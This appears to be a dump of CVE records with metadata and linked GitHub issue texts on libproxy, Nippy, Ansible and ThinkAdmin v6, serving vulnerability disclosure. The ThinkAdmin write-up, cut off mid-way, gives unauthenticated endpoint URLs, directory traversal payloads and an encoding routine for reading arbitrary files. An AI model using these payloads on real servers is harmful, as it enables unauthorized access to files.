[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00033.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libproxy/libproxy/issues/134" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00012.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CNID6EZVOVH7EZB7KFU2EON54CFDIVUR/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JF5JSONJNO64ARWRVOS6K6HSIPHEF3H2/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SSVZAAVHBJR3Z4MZNR55QW3OQFAS2STH/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4514-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4800" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00033.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libproxy/libproxy/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00012.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CNID6EZVOVH7EZB7KFU2EON54CFDIVUR/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JF5JSONJNO64ARWRVOS6K6HSIPHEF3H2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SSVZAAVHBJR3Z4MZNR55QW3OQFAS2STH/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4514-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4800" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libproxy_project:libproxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "52AFAA1F-0DF9-41AD-BD7B-0A3B87679898", "versionEndExcluding": null, "versionEndIncluding": "0.4.15", "versionStartExcluding": null, "versionStartIncluding": "0.4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*", "matchCriteriaId": "B009C22E-30A4-4288-BCF6-C3E81DEAF45A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/libproxy/libproxy/issues/134
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libproxy", "libproxy" ]
I found this in url.cpp: ``` static inline string recvline(int fd) { // Read a character. // If we don't get a character, return empty string. // If we are at the end of the line, return empty string. char c = '\0'; if (recv(fd, &c, 1, 0) != 1 || c == '\n') return ""; return string(1, c) + recvline(fd); } ``` Looks like the server that hosts the proxy authconfig file can cause libproxy to overflow the stack by sending an unending stream of characters without a newline. The PAC server should be trusted to not do that, but it's still not good. Normal use with a non-malicious server looks like this: ``` (gdb) bt #0 recvline (fd=4) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:389 #1 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #2 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #3 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #4 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #5 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #6 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #7 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #8 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #9 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #10 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #11 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #12 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #13 0x00007ffff7f987ac in recvline (fd=<optimized out>) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:398 #14 0x00007ffff7f99749 in libproxy::url::get_pac (this=this@entry=0x7fffffffdd30) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/url.cpp:464 #15 0x00007ffff7f8b7f9 in libproxy::proxy_factory::expand_pac (this=0x416eb0, confurl=...) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/proxy.cpp:393 #16 0x00007ffff7f9120a in libproxy::proxy_factory::get_proxies (this=0x416eb0, realurl=...) at /usr/src/debug/libproxy-0.4.15-17.fc32.x86_64/libproxy/proxy.cpp:215 #17 0x00007ffff7f916dc in px_proxy_factory_get_proxies (self=0x416eb0, url=0x402010 "https://lwn.net") at /usr/include/c++/10/bits/char_traits.h:300 #18 0x0000000000401188 in main () ```
(CVE-2020-25219) pac server can trigger unbounded recursion in url.cpp recvline()
https://api.github.com/repos/libproxy/libproxy/issues/134/comments
1
2020-09-07T17:47:52Z
2020-09-10T12:22:38Z
https://github.com/libproxy/libproxy/issues/134
695,310,556
134
1,420
CVE-2020-24164
2020-09-11T06:15:11.903
A deserialization flaw is present in Taoensso Nippy before 2.14.2. In some circumstances, it is possible for an attacker to create a malicious payload that, when deserialized, will allow arbitrary code to be executed. This occurs because there is automatic use of the Java Serializable interface.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ptaoussanis/nippy/issues/130" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ptaoussanis/nippy/issues/130" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:taoensso:nippy:*:*:*:*:*:*:*:*", "matchCriteriaId": "7F0B82F0-2B55-4EAF-98CB-208211CE99EB", "versionEndExcluding": "2.14.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/ptaoussanis/nippy/issues/130
[ "Third Party Advisory" ]
github.com
[ "ptaoussanis", "nippy" ]
# SECURITY ADVISORY [CVE-2020-24164] > This vulnerability kindly pointed out in an _excellent_ report by @solita-timo-mihaljov. _Huge_ thanks to Timo! ## Quick summary - Nippy versions from `v2.5.0-beta1` (24 Oct 2013) and before `v2.15.0 final` (24 Jul 2020) contain an RCE (Remote Code Execution) vulnerability that **may** allow an attacker to **execute arbitrary code** when thawing a **malicious payload** controlled by the attacker. - Similar vulnerabilities in the Jackson library have been [given](https://www.cvedetails.com/vulnerability-list/vendor_id-15866/product_id-34008/Fasterxml-Jackson.html) "High" CVE scores of 7.5 out of 10. ## Who is affected? You are vulnerable if the following conditions **all** hold: - You are thawing (deserializing) data from an **untrusted source** (usually not a great idea in general), or an attacker is somehow able to **inject data** into a trusted source. - You are using a Nippy version from `v2.5.0-beta1` (Oct 2013) through `v2.15.0-RC1`. - You have vulnerable "gadget" classes on your classpath that can be combined into a ["gadget chain"](https://www.youtube.com/watch?v=MTfE2OgUlKc). - **Important**: Clojure ~~<= `v1.8`~~ itself unfortunately [includes](https://clojure.atlassian.net/browse/CLJ-2204) such a chain. - Many other libraries do too, some examples [here](https://github.com/frohoff/ysoserial). ## Attack description 1. Attacker creates a **malicious payload**: an object of specific vulnerable class/es, which include malicious code. 2. Attacker manages to get the system to **freeze** and then **thaw** this malicious payload. 3. On thawing, the **malicious arbitrary code is run** within the same JVM process. ## How was the vulnerability introduced? With commit 9448d2b3cec5c (24 Oct 2013), Nippy introduced a feature to allow the automatic use of Java's `Serializable` interface as a fallback for types that Nippy didn't support via its own `Freezable` protocol. Unfortunately I wasn't aware of the concept of a gadget-chain attack until this report. ## Mitigation Upgrade to Nippy >= `v2.15.0 final`. Always prefer the latest stable version when possible. ---- # Upgrade instructions ## Upgrading to `v3` from earlier versions `v3` is safe by default, and often relatively painless to upgrade to. ### Default `v3` behaviour: - `freeze` will continue to allow _any_ Serializable class to be frozen, as in older vulnerable versions of Nippy. - When `thaw` encounters a disallowed Serialized class, it will: - Throw if the object was frozen with Nippy < `v2.15.0 final`. - Otherwise it will return a safely quarantined object of form `{:nippy/unthawable {:class-name <> :content <quarantined-ba>}`. - The default `thaw` allowlist contains a number of common safe class names. See its value for details. **Quarantined objects** may: - Be manually unquarantined with `read-quarantined-serializable-object-unsafe!`. - Themselves be safely frozen, thawed, transported, etc. ### Customising `v3` behaviour: There are two relevant **allowlists** for you to configure: - [`*freeze-serializable-allowlist*`](http://ptaoussanis.github.io/nippy/taoensso.nippy.html#var-*freeze-serializable-allowlist*) ; Checked when freezing - [`*thaw-serializable-allowlist*`](http://ptaoussanis.github.io/nippy/taoensso.nippy.html#var-*thaw-serializable-allowlist*) ; Checked when thawing See their docstrings for detailed configuration info and example values. In most cases, you'll want to leave `*freeze-serializable-allowlist*` to its default (permissive) value, then customize `*thaw-serializable-allowlist*` based on your risk profile and needs: - If you **never** thaw untrusted payloads (ideal goal whenever possible): a permissive `*thaw-serializable-allowlist*` like `{"*"}` would be fine. - If you **may** thaw untrusted payloads: consider expanding the default set of allowed classes as [necessary](https://github.com/ptaoussanis/nippy/issues/130#issuecomment-663822541). ## Upgrading to `v2.5` from earlier versions `v2.5` is safe by default, but can be somewhat painful to upgrade to due to the risk of `freeze` throwing in cases where it previously didn't throw. Prefer upgrading to `v3` if possible. ### Default `v2.5` behaviour: - When `freeze` encounters a disallowed Serialized class, it will throw. - When `thaw` encounters a disallowed Serialized class, it will: - Throw if the object was frozen with Nippy < `v2.15.0 final`. - Otherwise it will return a safely quarantined object of form `{:nippy/unthawable {:class-name <> :content <quarantined-ba>}`. - The default allowlist may contain a number of common safe class names. See its value for details. ### Customising `v2.5` behaviour: See `*serializable-whitelist*` docstring for detailed configuration info and example values. # Questions? Suggestions? Please feel free to comment on this thread. Will make a best effort to prioritise responses on this topic.
[CVE-2020-24164] Remote Code Execution (RCE) vulnerability via Java's Serializable interface
https://api.github.com/repos/taoensso/nippy/issues/130/comments
5
2020-07-24T15:47:42Z
2022-02-01T11:25:58Z
https://github.com/taoensso/nippy/issues/130
665,257,168
130
1,421
CVE-2020-14330
2020-09-11T18:15:13.147
An Improper Output Neutralization for Logs flaw was found in Ansible when using the uri module, where sensitive data is exposed to content and json output. This flaw allows an attacker to access the logs or outputs of performed tasks to read keys used in playbooks from other users within the uri module. The highest threat from this vulnerability is to data confidentiality.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.3, "impactScore": 3.6, "source": "secalert@redhat.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14330" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/68400" }, { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14330" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ansible/ansible/issues/68400" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4950" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ansible_engine:*:*:*:*:*:*:*:*", "matchCriteriaId": "4AA51D54-94D6-4A3C-AD5B-190C68C5C5AE", "versionEndExcluding": "2.9.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "532" ]
532
https://github.com/ansible/ansible/issues/68400
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ansible", "ansible" ]
##### SUMMARY uri module set string with masked content into content and json output ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME uri ##### ANSIBLE VERSION <!--- Paste verbatim output from "ansible --version" between quotes --> ```paste below ansible 2.9.0 config file = None configured module search path = ['/Users/hungluong/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /Users/hungluong/Library/Python/3.7/lib/python/site-packages/ansible executable location = /Users/hungluong/Library/Python/3.7/bin/ansible python version = 3.7.6 (default, Dec 30 2019, 19:38:26) [Clang 11.0.0 (clang-1100.0.33.16)] ``` ##### CONFIGURATION <!--- Paste verbatim output from "ansible-config dump --only-changed" between quotes --> ```paste below N/A ``` ##### OS / ENVIRONMENT <!--- Provide all relevant information below, e.g. target OS versions, network device firmware, etc. --> ##### STEPS TO REPRODUCE <!--- Describe exactly how to reproduce the problem, using a minimal test-case --> <!--- Paste example playbooks or commands between quotes below --> ```yaml - hosts: localhost connection: local tasks: - name: send request uri: url: "https://postman-echo.com/get?name=something-with-admin" user: admin password: admin method: GET force_basic_auth: yes return_content: yes status_code: 200 register: response - name: extract value vars: query: args.name set_fact: value_content: "{{ response.content }}" value_content_parsed: "{{ response.content | from_json | json_query(query) }}" value_json: "{{ response.json.args.name }}" - name: debug debug: msg: - "{{ 'something-with-admin' in value_json }}" - "{{ 'something-with-admin' in value_content }}" - "{{ 'something-with-admin' in value_content_parsed }}" - "{{ 'something-with-********' in value_json }}" - "{{ 'something-with-********' in value_content }}" - "{{ 'something-with-********' in value_content_parsed }}" ``` <!--- HINT: You can paste gist.github.com links for larger files --> ##### EXPECTED RESULTS The module should return the json/content value with the correct values ##### ACTUAL RESULTS <!--- Describe what actually happened. If possible run with extra verbosity (-vvvv) --> The module seems to apply sensitive info masking ('********') to value matching username/password in its output <!--- Paste verbatim command output between quotes --> ```paste below "msg": [ false, false, false, true, false, true ] ```
uri module set string with masked content into content and json output
https://api.github.com/repos/ansible/ansible/issues/68400/comments
12
2020-03-23T11:01:05Z
2020-06-18T13:00:08Z
https://github.com/ansible/ansible/issues/68400
586,120,912
68,400
1,422
CVE-2020-25540
2020-09-14T13:15:10.220
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zoujingli/ThinkAdmin/issues/244" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/zoujingli/ThinkAdmin/issues/244" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkadmin:thinkadmin:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "0E149B70-8FFA-469F-B90C-C3AE185F1658", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/zoujingli/ThinkAdmin/issues/244
[ "Exploit", "Third Party Advisory" ]
github.com
[ "zoujingli", "ThinkAdmin" ]
# ThinkAdmin v6 列目录/任意文件读取 `app/admin/controller/api/Update.php`存在3个function,都是不用登录认证就可以使用的,引用列表如下: ```php namespace app\admin\controller\api; use think\admin\Controller; use think\admin\service\InstallService; use think\admin\service\ModuleService; ``` `version()`可以获取到当前版本:`2020.08.03.01`,≤这个版本的都有可能存在漏洞 URL:[http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/version](http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/version) ## 列目录 `node()`: ```php /** * 读取文件列表 */ public function node() { $this->success('获取文件列表成功!', InstallService::instance()->getList( json_decode($this->request->post('rules', '[]', ''), true), json_decode($this->request->post('ignore', '[]', ''), true) )); } ``` 直接把POST的`rules`和`ignore`参数传给`InstallService::instance()->getList()`,根据上面的use引用可以知道文件路径在`vendor/zoujingli/think-library/src/service/InstallService.php`: ```php /** * 获取文件信息列表 * @param array $rules 文件规则 * @param array $ignore 忽略规则 * @param array $data 扫描结果列表 * @return array */ public function getList(array $rules, array $ignore = [], array $data = []): array { // 扫描规则文件 foreach ($rules as $key => $rule) { $name = strtr(trim($rule, '\\/'), '\\', '/'); $data = array_merge($data, $this->_scanList($this->root . $name)); } // 清除忽略文件 foreach ($data as $key => $item) foreach ($ignore as $ign) { if (stripos($item['name'], $ign) === 0) unset($data[$key]); } // 返回文件数据 return ['rules' => $rules, 'ignore' => $ignore, 'list' => $data]; } ``` `$ignore`可以不用关注,他会透过`_scanList()`去遍历`$rules`数组,调用`scanDirectory()`去递归遍历目录下的文件,最后在透过`_getInfo()`去获取文件名与哈希,由下面代码可以知道程序没有任何验证,攻击者可以在未授权的情况下读取服务器的文件列表。 ```php /** * 获取目录文件列表 * @param string $path 待扫描目录 * @param array $data 扫描结果 * @return array */ private function _scanList($path, $data = []): array { foreach (NodeService::instance()->scanDirectory($path, [], null) as $file) { $data[] = $this->_getInfo(strtr($file, '\\', '/')); } return $data; } ``` ```php /** * 获取所有PHP文件列表 * @param string $path 扫描目录 * @param array $data 额外数据 * @param string $ext 文件后缀 * @return array */ public function scanDirectory($path, $data = [], $ext = 'php') { if (file_exists($path)) if (is_file($path)) $data[] = $path; elseif (is_dir($path)) foreach (scandir($path) as $item) if ($item[0] !== '.') { $realpath = rtrim($path, '\\/') . DIRECTORY_SEPARATOR . $item; if (is_readable($realpath)) if (is_dir($realpath)) { $data = $this->scanDirectory($realpath, $data, $ext); } elseif (is_file($realpath) && (is_null($ext) || pathinfo($realpath, 4) === $ext)) { $data[] = strtr($realpath, '\\', '/'); } } return $data; } ``` ```php /** * 获取指定文件信息 * @param string $path 文件路径 * @return array */ private function _getInfo($path): array { return [ 'name' => str_replace($this->root, '', $path), 'hash' => md5(preg_replace('/\s+/', '', file_get_contents($path))), ]; } ``` 读取网站根目录Payload: [http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node](http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node) POST: ``` rules=["/"] ``` 也可以使用`../`来进行目录穿越 ``` rules=["../../../"] ``` 演示站: ![圖片](https://user-images.githubusercontent.com/40329078/91416267-b7c83d00-e881-11ea-9ff4-aced0fbb3c0b.png) ## 任意文件读取 `get()`: ```php /** * 读取文件内容 */ public function get() { $filename = decode(input('encode', '0')); if (!ModuleService::instance()->checkAllowDownload($filename)) { $this->error('下载的文件不在认证规则中!'); } if (file_exists($realname = $this->app->getRootPath() . $filename)) { $this->success('读取文件内容成功!', [ 'content' => base64_encode(file_get_contents($realname)), ]); } else { $this->error('读取文件内容失败!'); } } ``` 首先从GET读取`encode`参数并使用`decode()`解码: ```php /** * 解密 UTF8 字符串 * @param string $content * @return string */ function decode($content) { $chars = ''; foreach (str_split($content, 2) as $char) { $chars .= chr(intval(base_convert($char, 36, 10))); } return iconv('GBK//TRANSLIT', 'UTF-8', $chars); } ``` 解密UTF8字符串的,刚好上面有个加密UTF8字符串的`encode()`,攻击时直接调用那个就可以了: ```php /** * 加密 UTF8 字符串 * @param string $content * @return string */ function encode($content) { [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))]; for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); return $chars; } 